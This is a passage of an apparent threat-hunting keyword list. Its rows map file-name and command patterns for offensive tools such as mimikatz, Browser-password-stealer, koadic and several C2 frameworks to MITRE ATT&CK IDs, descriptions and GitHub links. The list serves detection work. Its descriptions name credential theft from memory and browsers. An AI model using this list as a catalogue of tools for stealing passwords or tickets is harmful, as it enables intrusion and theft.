T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge/login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\cookies.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\credit_cards.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\history.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsoft-edge\login_data.txt*,offensive_tool_keyword,Browser-password-stealer,This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!,T1003.002 - T1056.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/henry-richard7/Browser-password-stealer,1,0,N/A,10,4,304,51,2023-09-03T10:32:39Z,2020-09-15T09:23:56Z -*microsploit.git*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*Midl2Bytes.exe*,offensive_tool_keyword,SharpSystemTriggers,Collection of remote authentication triggers in C#,T1078 - T1059.001 - T1550,TA0002 - TA0005 - TA0040,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cube0x0/SharpSystemTriggers,1,1,N/A,10,4,366,43,2023-08-19T22:45:20Z,2021-09-12T18:18:15Z -*--mifi-username * --mifi-password * --number +*,offensive_tool_keyword,SMShell,PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers,T1021.001 - T1059.006 - T1071.004 - T1069.003,TA0002 - TA0011 - TA0009 - TA0040,N/A,N/A,C2,https://github.com/persistent-security/SMShell,1,0,N/A,10,10,272,20,2023-05-22T10:40:16Z,2023-05-22T08:26:44Z -*MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqKav9bmrSMSPwnxA3ul*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*MIIEoQIBAAKCAQEArJqP/6XFBa88x/DUootMmSzYa3MxcTV9FjNYUomqbQlGzuHa*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*MIIEowIBAAKCAQEAvZtOCbMyFKJN3n89nctTfYLSeiCTNG01rAFl06hMkobyzr0c*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,0,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*MIIEpAIBAAKCAQEAqqKav9bmrSMSPwnxA3ulIleTPGiL9LGtdROute8ncU0HzPyL*,offensive_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/m00zh33/golang_c2,1,0,N/A,10,10,4,8,2019-03-18T00:46:41Z,2019-03-19T02:39:59Z -*mimi32.exe *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimi64.exe *,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.pdb*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.sys*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimidrv.zip*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz -Command *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*mimikatz for Windows*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Mimikatz*,offensive_tool_keyword,mimikatz,Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets.,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*Mimikatz.cs*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*mimikatz.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*mimikatz.exe*,offensive_tool_keyword,FilelessPELoader,Loading Remote AES Encrypted PE in memory - Decrypted it and run it,T1027.001 - T1059.001 - T1071,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/FilelessPELoader,1,1,N/A,10,8,727,148,2023-08-29T21:46:11Z,2023-02-08T16:59:33Z -*mimikatz.exe*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mimikatz.raw*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*mimikatz_cred_collector.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*mimikatz_dotnet2js*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_dynwrapx*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_tashlib*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*mimikatz_trunk*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimikatz_x64.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mimikatz_x86.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MimikatzByPowerShellForDomain.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*MimikatzOnLocal.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*mimikittenz*,offensive_tool_keyword,mimikittenz,mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited Encryption Keys & All the other goodstuff,T1003 - T1216 - T1552 - T1002 - T1083,TA0003 - TA0008 - TA0006,N/A,N/A,POST Exploitation tools,https://github.com/orlyjamie/mimikittenz,1,1,N/A,10,10,1792,352,2020-10-16T01:20:30Z,2016-07-04T13:57:18Z -*mimilib (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib for Windows (mimikatz)*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.dll*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.dll*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilib.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*mimilove*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilove.exe*,offensive_tool_keyword,mimikatz,mimikatz exploitation ,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimilove.vcxproj*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*mimipenguin*,offensive_tool_keyword,mimipenguin,A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. This was assigned CVE-2018-20781 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20781). Fun fact its still not fixed after GNOME Keyring 3.27.2 and still works as of 3.28.0.2-1ubuntu1.18.04.1.,T1555 - T1003 - T1212 - T1558,TA0001 - TA0003,N/A,N/A,Credential 